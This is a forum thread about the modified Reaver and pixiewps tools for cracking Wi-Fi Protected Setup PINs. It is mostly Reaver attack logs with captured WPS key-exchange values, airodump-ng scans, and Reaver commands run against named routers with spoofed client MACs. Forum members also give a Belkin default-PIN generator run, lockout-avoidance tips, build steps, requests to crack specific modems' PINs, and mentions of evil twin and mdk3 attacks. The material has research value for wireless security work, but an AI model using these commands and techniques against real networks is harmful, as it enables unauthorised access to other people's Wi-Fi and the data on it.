[P] E-Hash1: d8:46:6a:42:ad:f5:1a:c0:4e:07:f3:19:89:01:7f:13:4d :a2:c5:49:f5:ba:83:2f:22:c1:31:71:5e:5e:31:9e
[P] E-Hash2: 62:b2:a7:fb:86:45:ed:89:f8:13:55:59:e4:91:70:0f:3a :26:5a:81:fd:71:60:13:fd:c2:c5:61:e4:85:1c:ba
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 95278582.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c0:d3:bf:2d:93:56:f7:70:dc:a8:59:f5:36:d0:72:93
[P] PKE: c5:86:72:3c:5a:5e:03:03:c1:13:4c:64:3e:3e:89:57:7b :76:f7:2b:1c:ff:2a:91:89:33:d6:d9:b3:bb:f4:d1:06:5 2:d9:01:87:cf:52:f5:6c:14:65:52:fd:8d:00:68:47:b9: d4:ca:14:db:8a:8a:3b:e6:d0:f1:eb:43:29:0f:28:5e:90 :48:95:fa:53:ef:bb:9c:9e:f0:61:1d:71:83:85:cb:a8:3 2:ea:8b:50:a2:21:00:a2:5d:73:b7:bd:6c:d5:94:89:12: 3d:e6:ca:5e:ff:8c:d5:4c:f4:d7:8b:9a:55:8e:5d:79:47 :a4:38:11:66:68:29:4b:16:84:9c:a0:47:19:c5:50:a8:3 6:97:73:d2:63:a9:f3:16:bb:2a:4a:6e:8f:d7:09:e1:ac: 5c:1f:68:19:17:b8:70:77:94:e0:d1:53:f7:8f:7d:f1:ad :14:c0:7e:da:9f:26:fe:19:ab:6c:52:dc:8e:88:fd:94:0 b:cb:33:ce:d1:61:42:8c:bb
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: b9:8a:d9:34:3e:d8:cd:45:b1:1d:f6:17:d1:16:fd:68:76 :3d:59:44:de:eb:14:ca:dd:db:34:7f:1f:70:6a:45:0b:c 1:0f:d7:c6:5e:5f:e0:be:30:ce:cc:66:9e:99:20:6c:86: 2e:5a:de:5f:40:47:ef:68:fc:cd:3a:59:40:fa:09:5a:6d :c7:af:31:2a:96:b9:7a:08:d2:fc:75:dc:4b:0b:da:ca:6 1:de:c6:4e:d4:c7:49:58:89:83:97:d9:ef:21:c9:70:07: 26:96:3a:6b:6b:71:34:fe:62:c0:61:ef:7e:66:bc:1c:44 :10:0f:54:59:ba:5a:77:46:75:ce:87:7e:71:12:94:b5:5 1:2f:6b:b7:19:7b:cf:e5:45:78:5f:8b:1f:e1:1e:3f:09: 1a:cc:99:4e:11:a7:fc:96:23:2d:8a:57:31:25:27:b6:67 :43:56:63:c2:d6:7d:96:50:9d:e8:72:2a:36:7a:a5:8d:0 3:c4:0e:92:5a:56:6e:34:22
[P] AuthKey: 34:92:98:34:a9:c5:f8:45:40:64:7e:e1:c5:de:27:af:88 :35:80:6b:1e:49:d4:6e:d3:94:d3:99:0e:69:07:2c
[+] Sending M2 message
^C

@ t6_x

Nice work matey, many thanks.

I've got a question, what does "-P, --pixiedust-loop" do? and when should it be used?.

I took screenshot on Wireshark .. M1-M2-M3-M4 messages and trying screen..

Why Pixiewps does not work for TP LiNK RTL 8671 EV 2006 27 07 (Realtek)?

Where is pin? :)

@ t6_x

Nice work matey, many thanks.

I've got a question, what does "-P, --pixiedust-loop" do? and when should it be used?.

It stops the wps exchange after the M3 message is received. This way (hopefully) we will avoid any lockouts... the router will report a failed WPS exchange and won't count it :D You should only use it when attacking via Pixie Dust. If you are doing a regular old 11,000 pin brute force, don't use it.

@t6_x

Just confirming the latest version on git (1.5.2) requires on the K 1 option to test all 3 chipsets now ?

Cheers
Exta

http://i.imgur.com/aZv2TNu.png
http://i.imgur.com/0zBtqpb.png
http://i.imgur.com/f8AUILE.png
http://i.imgur.com/n7Fs4s3.png
http://i.imgur.com/sC80azr.png
http://i.imgur.com/otwUL64.png
http://i.imgur.com/RpB5I6T.png
http://i.imgur.com/awpjzcU.png

I took screenshot on Wireshark .. M1-M2-M3-M4 messages and trying screen..

Why Pixiewps does not work for TP LiNK RTL 8671 EV 2006 27 07 (Realtek)?

Where is pin? :)


Because the failure of the pixiedust takes advantage, is a firmware failure and not a chipset failure.

But as it is difficult to make a list of all firmawares which exist, chipset list is made where there is a higher probability
the running attack work

Just the Belkin pin Attack

Target:

airodump-ng
CH 6 ][ Elapsed: 4 mins ][ 2015-04-19 09:48

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID MANUFACTURER

..............:52:A1 -66 24 1160 336 0 6 54e. WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.
..............:37:56 -83 0 5 0 0 6 54e WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.

BSSID STATION PWR Rate Lost Frames Probe

..............:52:A1 ..............:37:56 -86 54e- 1e 0 98 999 Kane

Reaver Attack

root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N -S -K1 -W1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from ..............:52:A1
[+] Associated with ..............:52:A1 (ESSID: 133 Kane)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 9c:60:b1:26:35:6b:54:36:94:b4:db:e3:8a:f8:98:99
[P] PKE: ee:4a:2f:c4:45:67:2e:c2:e8:89:0c:c0:ad:08:31:0c:98 :db:ce:d5:8c:53:23:8c:a3:e7:af:c1:f8:81:1f:69:88:8 c:28:b9:bc:02:3f:32:4a:f6:f0:59:21:59:35:d8:0c:8f: 44:ce:0d:34:f5:21:3f:8e:8e:d4:a1:03:62:4c:d2:e9:ea :fe:4d:15:72:a7:84:63:d6:0d:fb:c5:19:79:b8:57:96:b 6:7f:e1:f8:a8:fe:28:88:76:04:ae:46:54:92:0a:0c:38: c4:b9:c3:dc:36:45:3a:65:18:93:ee:f4:f0:cc:6c:10:8b :8e:bc:c2:c9:1f:10:9c:61:ff:ce:d4:31:32:8c:30:31:f 0:48:5d:2b:94:ec:c0:91:4e:2d:59:3f:e1:8c:13:c2:59: 63:73:dc:a3:0e:67:fc:a2:b3:06:e7:b5:c0:17:36:73:77 :14:d2:8f:d6:a2:d4:be:bb:4b:8f:3d:e6:2b:c0:81:50:0 f:da:d5:09:b4:12:18:d2:e8
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[Pin Gen] Belkin Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 92454590
[Pin Gen] Pin Generated (+1): 02932804
[Pin Gen] Pin Generated (-1): 81966103

Next Step? Try all three pins?
reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
Because reaver started looping, is this correct? had to ctrl+C


root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from ..............:52:A1
[+] Associated with ..............52:A1 (ESSID: 133 Kane)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[P] E-Nonce: 2c:7b:dd:2f:82:20:e5:a0:f6:92:35:7a:f6:c9:2a:e7
[P] PKE: 4a:6d:39:a0:aa:62:4c:05:69:35:0d:c8:7b:4a:5d:bf:8d :93:c6:49:93:c2:df:b5:ec:d6:73:cc:d6:4b:48:06:f2:2 c:52:37:c2:a7:95:1a:28:e6:65:b0:5d:f0:f5:7e:12:e0: 98:48:db:9a:4a:76:5d:45:3b:33:8e:d9:e6:d4:f4:76:42 :7b:03:73:29:d3:f1:3b:56:0d:e7:95:76:9d:f8:94:bb:5 a:67:59:45:73:70:d5:48:5b:5a:a2:89:d1:8f:69:43:00: 1c:bc:ce:ae:48:7b:08:9e:64:c2:d7:21:b3:ed:73:99:43 :dd:44:8a:a5:9a:24:fd:8c:02:7c:17:5c:f2:4a:5f:5b:9 c:c3:8d:99:c1:49:5b:2e:5f:09:63:85:ff:8a:72:77:c6: 0a:56:14:f7:29:28:9f:82:24:47:aa:1b:eb:28:16:0d:f0 :e2:a9:d0:f9:01:e4:61:a0:b8:24:44:71:34:d0:e5:f5:3 f:71:b8:88:12:04:01:36:15
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: e3:07:eb:ea:e5:8d:25:e4:a8:65:08:ab:52:99:3b:2c:8a :a4:c5:82:c9:46:96:62:1c:76:63:96:06:ba:e9:14:1d:d 1:c0:1f:42:27:38:99:6d:14:c6:79:00:bf:9d:f5:77:98: 73:9d:fd:83:52:f3:f1:cb:73:0e:e1:6d:d2:17:be:9b:ba :fc:16:f9:2d:22:e3:ab:c0:3a:90:b9:0c:3d:b0:0b:ad:9 0:89:b5:12:c9:41:3f:36:17:39:16:3b:a5:80:e4:a1:17: 39:9b:1f:24:3f:f1:20:21:6a:f0:48:a9:05:73:3c:b6:06 :c8:fe:34:a9:79:70:eb:ff:a8:7c:49:07:19:5f:c8:2e:7 6:a3:c7:8a:5d:10:28:72:f1:41:b2:38:d7:53:87:99:d4: bd:e0:9c:d7:01:01:cc:f9:b0:14:9e:6e:52:44:fe:34:66 :b0:64:a1:69:73:4f:09:0e:93:89:0b:c9:cb:b6:51:d5:5 f:ba:9e:7d:44:be:91:f0:d5
[P] AuthKey: 19:f0:66:81:34:9e:6f:eb:41:7f:93:38:f7:42:ba:ce:6d :88:06:0c:76:43:d4:cc:9b:0f:c8:44:9d:43:21:e5
[P] E-Hash1: 16:a4:f5:79:a7:5b:29:1d:1a:8f:d7:4e:dd:fd:5a:a6:8e :94:3c:34:f0:77:ae:e0:03:38:31:8f:85:25:fb:9c
[P] E-Hash2: 10:90:3b:33:ed:74:7c:5e:9d:51:b7:2d:8f:4b:55:5f:d6 :64:a2:91:7a:f7:66:7b:86:61:29:d1:a4:c0:bb:c4
[P] E-Nonce: 72:08:37:e8:34:12:e7:50:25:d4:c1:80:f9:68:a0:0b
[P] PKE: 19:a9:2d:d4:31:cb:f4:be:b8:38:bd:18:91:0a:de:f5:1b :1c:cf:6e:d3:c2:34:00:1e:88:db:6f:bd:a1:bb:d9:51:b c:d8:d2:60:24:c6:01:97:27:ee:ad:01:96:49:47:c4:e9: 44:e6:c7:84:3b:25:d5:b7:ab:bf:18:f3:39:0e:ee:74:6d :b6:f0:a4:dc:55:c1:cf:ad:4c:2d:a2:af:fb:21:a1:77:5 d:59:13:bc:0a:fd:6a:cc:91:97:96:78:7e:c0:88:65:7f: 0d:b1:b9:dd:85:7a:45:2c:2f:78:d9:af:2a:0e:37:12:66 :8f:c3:e8:fc:0c:b5:eb:32:5a:cd:36:88:91:ba:ad:3c:5 f:72:e9:b1:53:91:51:1c:24:39:f1:6a:73:e7:bb:b7:40: f0:35:61:7d:84:37:b3:21:32:3d:55:9d:a4:e7:94:9b:2a :53:45:40:d7:5b:8c:5b:20:95:ad:1e:df:01:f7:33:7a:9 8:ca:7b:5b:91:a7:d7:c9:da
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: 72:be:10:2b:73:ae:55:e7:d0:4e:8a:b7:f4:d5:4c:90:f5 :fe:83:9c:91:80:76:d7:93:bb:95:7c:07:67:3e:00:9c:5 4:f5:31:e5:be:13:cd:ad:77:93:13:5d:f8:fc:68:2d:27: 36:3e:2a:99:8e:08:fe:d5:e1:85:f1:f5:2d:e7:a0:13:48 :05:56:62:04:42:19:ef:ca:b9:6b:5c:15:02:37:df:51:c 5:12:a2:63:0e:ce:fa:c1:46:43:ef:3e:45:70:2c:8c:da: 21:ef:c3:6f:ea:81:de:85:b7:b0:df:f7:6a:84:48:f5:63 :d6:29:bf:a8:cf:1e:da:1a:ba:7f:d7:ed:58:c9:7b:65:f e:21:3c:e8:24:89:9b:50:bb:b5:b4:92:ea:ec:3b:2c:8e: 40:77:77:71:cb:37:b5:a6:76:8f:27:53:61:5b:ef:27:83 :ea:b9:af:93:89:93:4b:d4:a6:1f:56:c7:e1:5d:32:7c:6 8:0e:54:e8:a1:58:ab:1a:41
[P] AuthKey: c9:9d:b6:14:1f:5e:4d:c0:33:fb:84:01:5d:6f:f4:82:a3 :e7:e1:c9:2f:da:52:e0:65:7d:e5:11:45:a3:74:91
[P] E-Hash1: 0a:2f:d2:43:7f:21:b5:77:ab:84:a3:29:33:b0:6a:29:0e :56:e6:35:61:69:65:0b:70:37:34:6d:05:0e:82:ab
[P] E-Hash2: 6c:07:cf:fc:5a:9d:50:ed:4d:d3:76:73:cb:5f:58:ee:e3 :75:5f:e8:42:6d:f9:09:ee:14:5a:21:e2:98:b4:74
[P] E-Nonce: 3c:15:76:fe:ec:f9:26:91:a0:33:2e:cb:24:03:4b:a5
[P] PKE: f3:68:9b:3c:3e:9f:dc:1d:ac:0d:7c:1d:e0:fa:c1:b0:e9 :f5:5b:bf:42:18:e7:ee:15:c9:e8:88:fd:5e:01:27:7e:8 7:17:60:07:4f:1e:82:d7:02:bb:f7:a8:b1:df:9d:5d:58: 72:25:57:81:c8:32:5c:1d:97:46:77:81:af:0c:69:d8:46 :6e:3b:51:10:e2:22:07:45:c9:36:84:28:22:ec:69:c1:9 5:a4:79:9d:62:e6:40:9f:b3:61:60:59:0d:c7:55:3c:9c: 5c:30:7f:ec:6c:0e:2d:ba:16:b8:03:7b:52:f1:f1:95:9b :b6:d2:d2:88:a4:39:8f:99:89:5b:46:b2:b5:06:6c:2b:4 6:09:08:b5:72:94:ae:9a:d8:c1:a3:b5:e0:c1:b2:d0:ee: 47:eb:f1:44:5b:be:09:e0:48:79:68:e8:21:1c:5a:2a:8e :df:af:e9:cb:6f:77:1a:b3:ec:d5:d0:a4:3a:77:d5:4d:3 7:1c:98:97:d1:42:ae:62:db
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: 42:ba:10:a6:1e:5a:ce:c9:89:4b:df:91:66:02:98:84:5b :c0:5a:07:93:a1:fe:71:16:49:87:61:63:b8:fd:7e:ff:7 9:e6:ae:8e:a6:cd:7b:1d:3e:31:40:d1:c7:fc:50:90:48: 40:2d:b1:63:ee:c2:fc:d5:55:31:87:ed:98:a8:e0:ff:ac :cc:aa:ec:e2:b7:51:76:10:e0:47:11:9c:68:01:7e:65:7 4:9b:47:45:27:4e:44:b0:bd:32:09:b9:08:69:08:1a:ea: a0:93:78:da:ba:81:31:ee:6a:42:34:ec:7e:21:fb:f1:4b :f9:c3:03:43:1a:78:6a:3c:5f:0a:c6:42:28:c7:32:df:6 3:0e:ec:5a:38:22:49:98:54:9a:85:be:e4:67:f0:6a:9d: ed:a4:c2:3c:dc:d5:ed:14:29:da:25:4b:05:f7:fc:dc:76 :71:a5:48:ba:42:1a:ab:eb:e2:0f:d4:7a:ef:82:20:16:4 c:78:eb:9f:d5:16:4f:00:a2
[P] AuthKey: d8:65:80:ae:99:23:c9:af:b9:32:63:32:80:3e:57:c4:56 :42:59:bc:ee:e4:7d:21:53:dc:97:24:b8:02:ba:95
[P] E-Hash1: ae:7a:f6:a6:1b:ac:f5:60:89:1e:d9:5c:91:38:31:e4:c9 :3c:0f:74:d6:a2:c3:fb:6f:93:c1:09:6b:a7:88:a9
[P] E-Hash2: 19:54:44:af:8f:a0:da:11:4a:6e:05:34:aa:63:b6:0e:8c :8e:03:12:fa:ab:54:d0:3d:3e:d8:21:14:d6:ac:19

AP locked wps

CH 6 ][ Elapsed: 15 mins ][ 2015-04-19 10:31 ][ WPA handshake: ..............:52:A1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID MANUFACTURER

..............:52:A1 -66 23 5527 1778 0 6 54e. WPA2 CCMP PSK Locked 999 Kane Belkin International Inc.
..............:37:56 -77 77 1776 0 0 6 54e WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.

BSSID STATION PWR Rate Lost Frames Probe

Should I try other pins after I try unlocking the router?
whats the correct reaver command after pin found?

Linksys was recently acquired by Belkin... that is why it shows the Manufacturer as Belkin. However, based on your reaver output, you are attacking a Linksys WRT1900AC... which technically is NOT a Belkin router.

As far as I know, the WRT1900AC uses a Marvell chipset which is not very common, but certainly worth looking into as I assume they are very popular with all the WRT series fans. If you could get more data, I would love to take a look into it... hopefully with help from others :D

Thanks for the info.....I just went by airodumps manufacturer, silly noob, I should have seen that.
(used airodump because wash "rssi 00" on atheros chipset)

What info do you need?
Wireshark capture?
Send where?

Complete reaver WPS exchange and a cap of the exchange. You can e-mail it to my [email protected] (anti-spam haha)

reaver with or without small keys?
actually post the reaver syntax you want

reaver with or without small keys?
actually post the reaver syntax you want

without small keys.



Manufacturer:
Model:
Model Number:
Serial Number:
E-Nonce:
PKR:
PKR:
E-Hash1:
E-Hash2:
Authkey:


Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.

suggestion only

Get Reaver
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip

unzip master.zip (verify I'm not @ my pc)

Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install

@t6_x

Just confirming the latest version on git (1.5.2) requires on the K 1 option to test all 3 chipsets now ?

Cheers
Exta


Sorry for the delay to respond, not had much time this weekend

After tests and reviews, the best way to handle the situation is to make all possible attacks at once, even though much lighter time for this, the machine I'm using, takes about 1 min to finish one single pixiewps.

But even so, it is more practical effect only once, than to divide the attack on some other options.

I already was not very happy with the options, al soxrok2212 finally convinced me that it was better to have only one.

So the answer is yes, the only option -K 1 run pixiewps with all the arguments, the pixiewps turn when it receives all the arguments he makes all bruteforces known until the moment.

Just the Belkin pin Attack

Should I try other pins after I try unlocking the router?
whats the correct reaver command after pin found?


It generates 3 pin

This is because of the following.

Not to know what the Mac that the router is using to generate the pin.

So first it generates the pin for the BSSID used.

After it generates the pin for the BSSID + 1, which is the MAC added +1 on the last value, that is why many routers Mac is sequential.

ex:

mac lan 00: 00: 00: 00: 00: 05
Wlan1 00: 00: 00: 00: 00: 06

But some models the wlan1 is the main mac and mac lan is the next, so as not to be sure of, is generated pin for Mac, Mac +1 and -1 Mac

But of course you can have models that do not follow this rule, but all looked so far followed, some were the following mac and other previous mac






Now with relation to the loop, missed the -vv option to really know what was going on, but I believe the pin gen generated not the correct pin and he was in the same loop trying to pin up the router go into lock.

So far found only one router that the pin gen managed to generate correctly.

In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? a full handshake right? and then a seperate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?

For those wondering what reavers -P option is intended for:

Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with intent of:

----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..

----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.

----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.

without small keys.



Manufacturer:
Model:
Model Number:
Serial Number:
E-Nonce:
PKR:
PKR:
E-Hash1:
E-Hash2:
Authkey:


Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.

Hello soxrox2212,



Manufacturer: AirTies Wireless Networks
Model:AirTies Air5650
Model Number: 1.0.2.0
Serial Number: AT1731430001111
E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9 e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e: ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e :78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:6 6:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb: 73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15 :aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1 b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42: d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d :e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:f a:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6: 6d:e3:d9:60:3a:89:70:c3:2c:81

PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b 8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2: 73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05 :35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:b f:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0: 6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78 :f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:9 4:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb: bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4 :16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e 9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8: ff:a8:09:a3:ec:6f:e7:ae:8d:0e (without -S)

PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:02 (with -S)

E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22 :32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:c f

E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2 :82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80

Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72: 2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa :86


Pıxıe is invulnerable for this modem . I wanna ask that maybe there is combination ,

Example ;

EHASH1=EHASK2=Serial number?...

Can you try to find this modem's pin?

Thanks

Hello,

a suggestion for wash:
can you add some kind of oui-support (like the -M switch in aircrack) ?

Thanks.

In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? a full handshake right? and then a seperate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?

For you to crack, all you need is t6_x's version of Reaver and pixiewps. For us to analyze, we need a cap of the wps exchange and the output of reaver.

Hello soxrox2212,



Manufacturer: AirTies Wireless Networks
Model:AirTies Air5650
Model Number: 1.0.2.0
Serial Number: AT1731430006993
E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9 e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e: ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e :78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:6 6:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb: 73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15 :aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1 b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42: d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d :e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:f a:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6: 6d:e3:d9:60:3a:89:70:c3:2c:81

PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b 8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2: 73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05 :35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:b f:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0: 6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78 :f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:9 4:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb: bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4 :16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e 9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8: ff:a8:09:a3:ec:6f:e7:ae:8d:0e (without -S)

PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:02 (with -S)

E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22 :32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:c f

E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2 :82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80

Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72: 2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa :86


Pıxıe is invulnerable for this modem . I wanna ask that maybe there is combination ,

Example ;

EHASH1=EHASK2=Serial number?...

Can you try to find this modem's pin?

Thanks

While this is certainly possible, I highly doubt that E-S1 = E-S2 = Serial number for a few reasons:

1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

2- Serial numbers can vary in length and conversion to HEX would give us a different length of data than we need.

1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

very good point.

some if it be useful
http://rpc.one.pl/pliki/openwrt/backfire/10.03.x/atheros/hostapd/dokumentacja/README-WPS

Focus on TP-LINK TL-WR740N :(
is it possible to invent something ?

some if it be useful
http://rpc.one.pl/pliki/openwrt/backfire/10.03.x/atheros/hostapd/dokumentacja/README-WPS

Focus on TP-LINK TL-WR740N :(
is it possible to invent something ?

theoretically yes

But not in practice, the sampling space to bruteforce ends up being very large, bordering the "infinity", then the time for bruteforce ends up being a few decades.

There are some tplink models with old firmware that the generation of the keys is based on the router's time, these yes, it is possible to attack, but I believe that nowadays are very rare. So far not found any, only what I have here at home, which is the year of 2005-2007, not remember.

The firmware analysis takes too long and is an absurdly boring job, it may be that over time appear some news

Тhank you for your attention!
if there is more convenient to create "Evil Twin attack"
Are you familiar with this?

For you to crack, all you need is t6_x's version of Reaver. For us to analyze, we need a cap of the wps exchange and the output of reaver.

Cracking's no issue... Would it be best to start with an evil twin to get the handshake cap? or would a wireshark cap with mdk3 runnin be sufficient?

How can i make reaver send M2 without sending M1?

Hi T6_x,

Which Mac adress is orjinal mac on modem? wlan0-1? Wlan0= F8:1A:67.... wlan0-1= FA:1A:67 ....??

Probably , you can update something with this information...




br-admin Link encap:Ethernet HWaddr F8:1A:67:40:02:33
inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
